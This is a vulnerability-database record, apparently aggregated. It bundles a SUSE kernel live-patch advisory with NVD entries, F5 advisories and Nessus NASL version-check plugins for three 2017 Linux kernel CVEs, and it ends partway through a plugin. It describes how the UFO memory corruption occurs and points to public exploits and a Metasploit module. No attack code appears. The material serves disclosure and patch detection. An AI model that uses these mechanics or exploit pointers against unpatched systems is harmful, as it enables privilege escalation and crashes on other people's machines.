{"href": "http://lists.opensuse.org/opensuse-security-announce/2017-09/msg00058.html", "id": "SUSE-SU-2017:2497-1", "reporter": "Suse", "published": "2017-09-15T18:08:11", "description": "This update for the Linux Kernel 3.12.61-52_83 fixes several issues.\n\n The following security bugs were fixed:\n\n - CVE-2017-1000112: Prevent a race condition in net-packet code that could\n have been exploited by unprivileged users to gain root access\n (bsc#1052368).\n - CVE-2017-7645: The NFSv2/NFSv3 server in the nfsd subsystem in the Linux\n kernel allowed remote attackers to cause a denial of service (system\n crash) via a long RPC reply (bsc#1046191).\n - CVE-2017-9242: The __ip6_append_data function in net/ipv6/ip6_output.c\n in the Linux kernel was too late in checking whether an overwrite of an\n skb data structure may occur, which allowed local users to cause a\n denial of service (system crash) via crafted system calls (bsc#1042892).\n\n", "title": "Security update for Linux Kernel Live Patch 24 for SLE 12 (important)", "affectedPackage": [{"arch": "x86_64", "packageName": "kgraft-patch-3_12_61-52_83-default-2", "operator": "lt", "OS": "SUSE Linux Enterprise Server", "packageFilename": "kgraft-patch-3_12_61-52_83-default-2-2.2.x86_64.rpm", "packageVersion": "2.2", "OSVersion": "12"}, {"arch": "x86_64", "packageName": "kgraft-patch-3_12_61-52_83-xen-2", "operator": "lt", "OS": "SUSE Linux Enterprise Server", "packageFilename": "kgraft-patch-3_12_61-52_83-xen-2-2.2.x86_64.rpm", "packageVersion": "2.2", "OSVersion": "12"}], "bulletinFamily": "unix", "type": "suse", "cvss": {"score": 7.8, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:COMPLETE/"}, "references": ["https://bugzilla.suse.com/1052311", "https://bugzilla.suse.com/1042892", "https://bugzilla.suse.com/1052368", "https://bugzilla.suse.com/1046191"], "edition": 1, "cvelist": ["CVE-2017-7645", "CVE-2017-9242", "CVE-2017-1000112"], "lastseen": "2017-09-15T19:29:20", "viewCount": 572, "enchantments": {"score": {"value": 7.0, "vector": "NONE", "modified": "2017-09-15T19:29:20", "rev": 2}, "dependencies": {"references": [{"type": "cve", "idList": ["CVE-2017-7645", "CVE-2017-1000112", "CVE-2017-9242"]}, {"type": "f5", "idList": ["F5:K48281956", "F5:K60250153"]}, {"type": "suse", "idList": ["SUSE-SU-2017:2098-1", "SUSE-SU-2017:2448-1", "SUSE-SU-2017:2476-1", "SUSE-SU-2017:2447-1", "SUSE-SU-2017:2791-1", "SUSE-SU-2017:2091-1", "SUSE-SU-2017:2103-1", "SUSE-SU-2017:2475-1", "SUSE-SU-2017:2775-1", "SUSE-SU-2017:2102-1"]}, {"type": "nessus", "idList": ["SUSE_SU-2017-2102-1.NASL", "SUSE_SU-2017-2497-1.NASL", "SUSE_SU-2017-2100-1.NASL", "SUSE_SU-2017-2775-1.NASL", "SUSE_SU-2017-2447-1.NASL", "SUSE_SU-2017-2103-1.NASL", "SUSE_SU-2017-2446-1.NASL", "SUSE_SU-2017-2476-1.NASL", "SUSE_SU-2017-2448-1.NASL", "SUSE_SU-2017-2475-1.NASL"]}, {"type": "seebug", "idList": ["SSV:96343"]}, {"type": "hackerone", "idList": ["H1:684573"]}, {"type": "virtuozzo", "idList": ["VZA-2017-079", "VZA-2017-037", "VZA-2017-038", "VZA-2017-077", "VZA-2017-078", "VZA-2017-036", "VZA-2017-042"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562311220171256"]}, {"type": "exploitdb", "idList": ["EDB-ID:43418", "EDB-ID:47169"]}, {"type": "redhat", "idList": ["RHSA-2019:1931", "RHSA-2019:1932"]}, {"type": "exploitpack", "idList": ["EXPLOITPACK:A5820DF756E60078D7D5399A134D0CEE"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/LINUX/LOCAL/UFO_PRIVILEGE_ESCALATION"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:148795"]}, {"type": "myhack58", "idList": ["MYHACK58:62201789313"]}], "modified": "2017-09-15T19:29:20", "rev": 2}, "vulnersScore": 7.0}, "modified": "2017-09-15T18:08:11"}

{"cve": [{"lastseen": "2020-12-09T20:13:18", "description": "Linux kernel: Exploitable memory corruption due to UFO to non-UFO path switch. When building a UFO packet with MSG_MORE __ip_append_data() calls ip_ufo_append_data() to append. However in between two send() calls, the append path can be switched from UFO to non-UFO one, which leads to a memory corruption. In case UFO packet lengths exceeds MTU, copy = maxfraglen - skb->len becomes negative on the non-UFO path and the branch to allocate new skb is taken. This triggers fragmentation and computation of fraggap = skb_prev->len - maxfraglen. Fraggap can exceed MTU, causing copy = datalen - transhdrlen - fraggap to become negative. Subsequently skb_copy_and_csum_bits() writes out-of-bounds. A similar issue is present in IPv6 code. The bug was introduced in e89e9cf539a2 (\"[IPv4/IPv6]: UFO Scatter-gather approach\") on Oct 18 2005.", "edition": 7, "cvss3": {"exploitabilityScore": 1.0, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.0, "privilegesRequired": "LOW", "vectorString": "CVSS:3.0/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2017-10-05T01:29:00", "title": "CVE-2017-1000112", "type": "cve", "cwe": ["CWE-362"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.4, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 6.9, "vectorString": "AV:L/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-1000112"], "modified": "2018-08-06T01:29:00", "cpe": ["cpe:/o:linux:linux_kernel:4.13.9"], "id": "CVE-2017-1000112", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-1000112", "cvss": {"score": 6.9, "vector": "AV:L/AC:M/Au:N/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:o:linux:linux_kernel:4.13.9:*:*:*:*:*:*:*"]}, {"lastseen": "2020-12-09T20:13:38", "description": "The __ip6_append_data function in net/ipv6/ip6_output.c in the Linux kernel through 4.11.3 is too late in checking whether an overwrite of an skb data structure may occur, which allows local users to cause a denial of service (system crash) via crafted system calls.", "edition": 5, "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "NONE", "baseScore": 5.5, "privilegesRequired": "LOW", "vectorString": "CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 3.6}, "published": "2017-05-27T01:29:00", "title": "CVE-2017-9242", "type": "cve", "cwe": ["CWE-20"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "COMPLETE", "integrityImpact": "NONE", "baseScore": 4.9, "vectorString": "AV:L/AC:L/Au:N/C:N/I:N/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 6.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-9242"], "modified": "2018-01-05T02:31:00", "cpe": ["cpe:/o:linux:linux_kernel:4.11.3"], "id": "CVE-2017-9242", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-9242", "cvss": {"score": 4.9, "vector": "AV:L/AC:L/Au:N/C:N/I:N/A:C"}, "cpe23": ["cpe:2.3:o:linux:linux_kernel:4.11.3:*:*:*:*:*:*:*"]}, {"lastseen": "2020-12-09T20:13:37", "description": "The NFSv2/NFSv3 server in the nfsd subsystem in the Linux kernel through 4.10.11 allows remote attackers to cause a denial of service (system crash) via a long RPC reply, related to net/sunrpc/svc.c, fs/nfsd/nfs3xdr.c, and fs/nfsd/nfsxdr.c.", "edition": 5, "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "NONE", "baseScore": 7.5, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 3.6}, "published": "2017-04-18T14:59:00", "title": "CVE-2017-7645", "type": "cve", "cwe": ["CWE-20"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "COMPLETE", "integrityImpact": "NONE", "baseScore": 7.8, "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-7645"], "modified": "2018-11-30T21:33:00", "cpe": ["cpe:/o:linux:linux_kernel:4.10.11"], "id": "CVE-2017-7645", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-7645", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:C"}, "cpe23": ["cpe:2.3:o:linux:linux_kernel:4.10.11:*:*:*:*:*:*:*"]}], "f5": [{"lastseen": "2020-04-06T22:40:49", "bulletinFamily": "software", "cvelist": ["CVE-2017-1000112"], "description": "\nF5 Product Development has assigned ID 710148 (BIG-IP) to this vulnerability. Additionally, [BIG-IP iHealth](<http://www.f5.com/support/support-tools/big-ip-ihealth/>) may list Heuristic H60250153 on the **Diagnostics** &gt; **Identified** &gt; **Medium** page.\n\nTo determine if your product and version have been evaluated for this vulnerability, refer to the **Applies to (see versions)** box. To determine if your release is known to be vulnerable, the components or features that are affected by the vulnerability, and for information about releases or hotfixes that address the vulnerability, refer to the following table.\n\nProduct | Branch | Versions known to be vulnerable | Fixes introduced in | Severity | CVSSv3 score1 | Vulnerable component or feature \n---|---|---|---|---|---|--- \nBIG-IP (LTM, AAM, AFM, Analytics, APM, ASM, DNS, Edge Gateway, GTM, Link Controller, PEM, WebAccelerator, WebSafe) | 14.x | None | Not applicable | Not vulnerable2 | None | None \n13.x | None | Not applicable \n12.x | None | Not applicable \n11.x | None | Not applicable \nARX | 6.x | None | Not applicable | Not vulnerable | None | None \nEnterprise Manager | 3.x | None | Not applicable | Not vulnerable | None | None \nBIG-IQ Centralized Management | 5.x | None | Not applicable | Not vulnerable | None | None \n4.x | None | Not applicable \nBIG-IQ Cloud and Orchestration | 1.x | None | Not applicable | Not vulnerable | None | None \nF5 iWorkflow | 2.x | None | Not applicable | Not vulnerable | None | None \nLineRate | 2.x | None | Not applicable | Not vulnerable | None | None \nTraffix SDC | 5.x | None | Not applicable | Not vulnerable | None | None \n4.x | None | Not applicable \n \n1The CVSSv3 score link takes you to a resource outside of AskF5, and it is possible that the document may be removed without our knowledge.\n\n2These products contain the affected code. However, F5 has determined the vulnerability status to be Not vulnerable because the attacker cannot exploit the code in default, standard, or recommended configurations. \n\nNone\n\n * [K51812227: Understanding Security Advisory versioning](<https://support.f5.com/csp/article/K51812227>)\n * [K41942608: Overview of Security Advisory articles](<https://support.f5.com/csp/article/K41942608>)\n * [K4602: Overview of the F5 security vulnerability response policy](<https://support.f5.com/csp/article/K4602>)\n * [K9970: Subscribing to email notifications regarding F5 products](<https://support.f5.com/csp/article/K9970>)\n * [K9957: Creating a custom RSS feed to view new and updated documents](<https://support.f5.com/csp/article/K9957>)\n", "edition": 1, "modified": "2018-11-19T19:47:00", "published": "2018-03-15T01:22:00", "id": "F5:K60250153", "href": "https://support.f5.com/csp/article/K60250153", "title": "Linux kernel vulnerability CVE-2017-1000112", "type": "f5", "cvss": {"score": 6.9, "vector": "AV:L/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2017-07-19T02:20:08", "bulletinFamily": "software", "cvelist": ["CVE-2017-7645"], "description": "\nF5 Product Development has evaluated the currently supported releases for potential vulnerability.\n\nTo determine if your release is known to be vulnerable, the components or features that are affected by the vulnerability, and for information about releases or hotfixes that address the vulnerability, refer to the following table:\n\nProduct| Versions known to be vulnerable| Versions known to be not vulnerable| Severity| Vulnerable component or feature \n---|---|---|---|--- \nBIG-IP LTM| None| 13.0.0 \n12.0.0 - 12.1.2 \n11.4.1 - 11.6.1 \n11.2.1| Not vulnerable| None \nBIG-IP AAM| None| 13.0.0 \n12.0.0 - 12.1.2 \n11.4.1 - 11.6.1| Not vulnerable| None \nBIG-IP AFM| None| 13.0.0 \n12.0.0 - 12.1.2 \n11.4.1 - 11.6.1| Not vulnerable| None \nBIG-IP Analytics| None| 13.0.0 \n12.0.0 - 12.1.2 \n11.4.1 - 11.6.1 \n11.2.1| Not vulnerable| None \nBIG-IP APM| None| 13.0.0 \n12.0.0 - 12.1.2 \n11.4.1 - 11.6.1 \n11.2.1| Not vulnerable| None \nBIG-IP ASM| None| 13.0.0 \n12.0.0 - 12.1.2 \n11.4.1 - 11.6.1 \n11.2.1| Not vulnerable| None \nBIG-IP DNS| None| 13.0.0 \n12.0.0 - 12.1.2| Not vulnerable| None \nBIG-IP Edge Gateway| None| 11.2.1| Not vulnerable| None \nBIG-IP GTM| None| 11.4.1 - 11.6.1 \n11.2.1| Not vulnerable| None \nBIG-IP Link Controller| None| 13.0.0 \n12.0.0 - 12.1.2 \n11.4.1 - 11.6.1 \n11.2.1| Not vulnerable| None \nBIG-IP PEM| None| 13.0.0 \n12.0.0 - 12.1.2 \n11.4.1 - 11.6.1| Not vulnerable| None \nBIG-IP PSM| None| 11.4.1| Not vulnerable| None \nBIG-IP WebAccelerator| None| 11.2.1| Not vulnerable| None \nBIG-IP WebSafe| None| 13.0.0 \n12.0.0 - 12.1.2 \n11.6.0 - 11.6.1| Not vulnerable| None \nARX| None| 6.2.0 - 6.4.0| Not vulnerable| None \nEnterprise Manager| None| 3.1.1| Not vulnerable| None \nBIG-IQ Cloud| None| 4.4.0 - 4.5.0| Not vulnerable| None \nBIG-IQ Device| None| 4.4.0 - 4.5.0| Not vulnerable| None \nBIG-IQ Security| None| 4.4.0 - 4.5.0| Not vulnerable| None \nBIG-IQ ADC| None| 4.5.0| Not vulnerable| None \nBIG-IQ Centralized Management| None| 5.0.0 - 5.3.0 \n4.6.0| Not vulnerable| None \nBIG-IQ Cloud and Orchestration| None| 1.0.0| Not vulnerable| None \nF5 iWorkflow| None| 2.0.0 - 2.2.0| Not vulnerable| None \nLineRate| None| 2.5.0 - 2.6.2| Not vulnerable| None \nTraffix SDC| None| 5.0.0 - 5.1.0 \n4.0.0 - 4.4.0| Not vulnerable| None\n\nNone\n\n * [K9970: Subscribing to email notifications regarding F5 products](<https://support.f5.com/csp/article/K9970>)\n * [K9957: Creating a custom RSS feed to view new and updated documents](<https://support.f5.com/csp/article/K9957>)\n * [K4602: Overview of the F5 security vulnerability response policy](<https://support.f5.com/csp/article/K4602>)\n * [K4918: Overview of the F5 critical issue hotfix policy](<https://support.f5.com/csp/article/K4918>)\n", "edition": 1, "modified": "2017-07-19T00:49:00", "published": "2017-07-19T00:49:00", "href": "https://support.f5.com/csp/article/K48281956", "id": "F5:K48281956", "title": "NFSv2/3 kernel vulnerability CVE-2017-7645", "type": "f5", "cvss": {"score": 7.8, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:COMPLETE/"}}], "nessus": [{"lastseen": "2021-01-07T14:26:26", "description": "This update for the Linux Kernel 3.12.61-52_86 fixes several issues.\nThe following security bugs were fixed :\n\n - CVE-2017-9242: The __ip6_append_data function in\n net/ipv6/ip6_output.c in the Linux kernel was too late\n in checking whether an overwrite of an skb data\n structure may occur, which allowed local users to cause\n a denial of service (system crash) via crafted system\n calls (bsc#1042892).\n\n - CVE-2017-7645: The NFSv2/NFSv3 server in the nfsd\n subsystem in the Linux kernel allowed remote attackers\n to cause a denial of service (system crash) via a long\n RPC reply (bsc#1046191).\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the SUSE security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.", "edition": 28, "cvss3": {"score": 7.5, "vector": "AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H"}, "published": "2017-09-15T00:00:00", "title": "SUSE SLES12 Security Update : kernel (SUSE-SU-2017:2475-1)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2017-7645", "CVE-2017-9242", "CVE-2017-1000112"], "modified": "2017-09-15T00:00:00", "cpe": ["cpe:/o:novell:suse_linux:12", "p-cpe:/a:novell:suse_linux:kgraft-patch-3_12_61-52_86-xen", "p-cpe:/a:novell:suse_linux:kgraft-patch-3_12_61-52_86-default"], "id": "SUSE_SU-2017-2475-1.NASL", "href": "https://www.tenable.com/plugins/nessus/103247", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from SUSE update advisory SUSE-SU-2017:2475-1.\n# The text itself is copyright (C) SUSE.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(103247);\n script_version(\"3.9\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/06\");\n\n script_cve_id(\"CVE-2017-1000112\", \"CVE-2017-7645\", \"CVE-2017-9242\");\n\n script_name(english:\"SUSE SLES12 Security Update : kernel (SUSE-SU-2017:2475-1)\");\n script_summary(english:\"Checks rpm output for the updated packages.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote SUSE host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"This update for the Linux Kernel 3.12.61-52_86 fixes several issues.\nThe following security bugs were fixed :\n\n - CVE-2017-9242: The __ip6_append_data function in\n net/ipv6/ip6_output.c in the Linux kernel was too late\n in checking whether an overwrite of an skb data\n structure may occur, which allowed local users to cause\n a denial of service (system crash) via crafted system\n calls (bsc#1042892).\n\n - CVE-2017-7645: The NFSv2/NFSv3 server in the nfsd\n subsystem in the Linux kernel allowed remote attackers\n to cause a denial of service (system crash) via a long\n RPC reply (bsc#1046191).\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the SUSE security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1042892\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1046191\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1052311\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1052368\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2017-1000112/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2017-7645/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2017-9242/\"\n );\n # https://www.suse.com/support/update/announcement/2017/suse-su-20172475-1/\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?45c7a280\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"To install this SUSE Security Update use YaST online_update.\nAlternatively you can run the command listed for your product :\n\nSUSE Linux Enterprise Server 12-LTSS:zypper in -t patch\nSUSE-SLE-SERVER-12-2017-1542=1\n\nTo bring your system up-to-date, use 'zypper patch'.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:N/I:N/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:F/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Linux Kernel UDP Fragmentation Offset (UFO) Privilege Escalation');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:kgraft-patch-3_12_61-52_86-default\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:kgraft-patch-3_12_61-52_86-xen\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:suse_linux:12\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2017/04/18\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/09/14\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/09/15\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2017-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release !~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"SUSE\");\nos_ver = pregmatch(pattern: \"^(SLE(S|D)\\d+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"SUSE\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^(SLES12)$\", string:os_ver)) audit(AUDIT_OS_NOT, \"SUSE SLES12\", \"SUSE \" + os_ver);\n\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (cpu !~ \"^i[3-6]86$\" && \"x86_64\" >!< cpu && \"s390x\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"SUSE \" + os_ver, cpu);\nif (cpu >!< \"x86_64\") audit(AUDIT_ARCH_NOT, \"x86_64\", cpu);\n\n\nsp = get_kb_item(\"Host/SuSE/patchlevel\");\nif (isnull(sp)) sp = \"0\";\nif (os_ver == \"SLES12\" && (! preg(pattern:\"^(0)$\", string:sp))) audit(AUDIT_OS_NOT, \"SLES12 SP0\", os_ver + \" SP\" + sp);\n\n\nflag = 0;\nif (rpm_check(release:\"SLES12\", sp:\"0\", cpu:\"x86_64\", reference:\"kgraft-patch-3_12_61-52_86-default-2-2.2\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", cpu:\"x86_64\", reference:\"kgraft-patch-3_12_61-52_86-xen-2-2.2\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"kernel\");\n}\n", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:C"}}, {"lastseen": "2021-01-07T14:26:26", "description": "This update for the Linux Kernel 3.12.61-52_89 fixes several issues.\nThe following security bugs were fixed :\n\n - CVE-2017-9242: The __ip6_append_data function in\n net/ipv6/ip6_output.c in the Linux kernel was too late\n in checking whether an overwrite of an skb data\n structure may occur, which allowed local users to cause\n a denial of service (system crash) via crafted system\n calls (bsc#1042892).\n\n - CVE-2017-7645: The NFSv2/NFSv3 server in the nfsd\n subsystem in the Linux kernel allowed remote attackers\n to cause a denial of service (system crash) via a long\n RPC reply (bsc#1046191).\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the SUSE security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.", "edition": 28, "cvss3": {"score": 7.5, "vector": "AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H"}, "published": "2017-09-15T00:00:00", "title": "SUSE SLES12 Security Update : kernel (SUSE-SU-2017:2476-1)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2017-7645", "CVE-2017-9242", "CVE-2017-1000112"], "modified": "2017-09-15T00:00:00", "cpe": ["cpe:/o:novell:suse_linux:12", "p-cpe:/a:novell:suse_linux:kgraft-patch-3_12_61-52_89-xen", "p-cpe:/a:novell:suse_linux:kgraft-patch-3_12_61-52_89-default"], "id": "SUSE_SU-2017-2476-1.NASL", "href": "https://www.tenable.com/plugins/nessus/103248", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from SUSE update advisory SUSE-SU-2017:2476-1.\n# The text itself is copyright (C) SUSE.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(103248);\n script_version(\"3.9\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/06\");\n\n script_cve_id(\"CVE-2017-1000112\", \"CVE-2017-7645\", \"CVE-2017-9242\");\n\n script_name(english:\"SUSE SLES12 Security Update : kernel (SUSE-SU-2017:2476-1)\");\n script_summary(english:\"Checks rpm output for the updated packages.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote SUSE host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"This update for the Linux Kernel 3.12.61-52_89 fixes several issues.\nThe following security bugs were fixed :\n\n - CVE-2017-9242: The __ip6_append_data function in\n net/ipv6/ip6_output.c in the Linux kernel was too late\n in checking whether an overwrite of an skb data\n structure may occur, which allowed local users to cause\n a denial of service (system crash) via crafted system\n calls (bsc#1042892).\n\n - CVE-2017-7645: The NFSv2/NFSv3 server in the nfsd\n subsystem in the Linux kernel allowed remote attackers\n to cause a denial of service (system crash) via a long\n RPC reply (bsc#1046191).\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the SUSE security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1042892\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1046191\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1052311\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1052368\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2017-1000112/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2017-7645/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2017-9242/\"\n );\n # https://www.suse.com/support/update/announcement/2017/suse-su-20172476-1/\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?e43a6240\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"To install this SUSE Security Update use YaST online_update.\nAlternatively you can run the command listed for your product :\n\nSUSE Linux Enterprise Server 12-LTSS:zypper in -t patch\nSUSE-SLE-SERVER-12-2017-1543=1\n\nTo bring your system up-to-date, use 'zypper patch'.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:N/I:N/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:F/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Linux Kernel UDP Fragmentation Offset (UFO) Privilege Escalation');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", 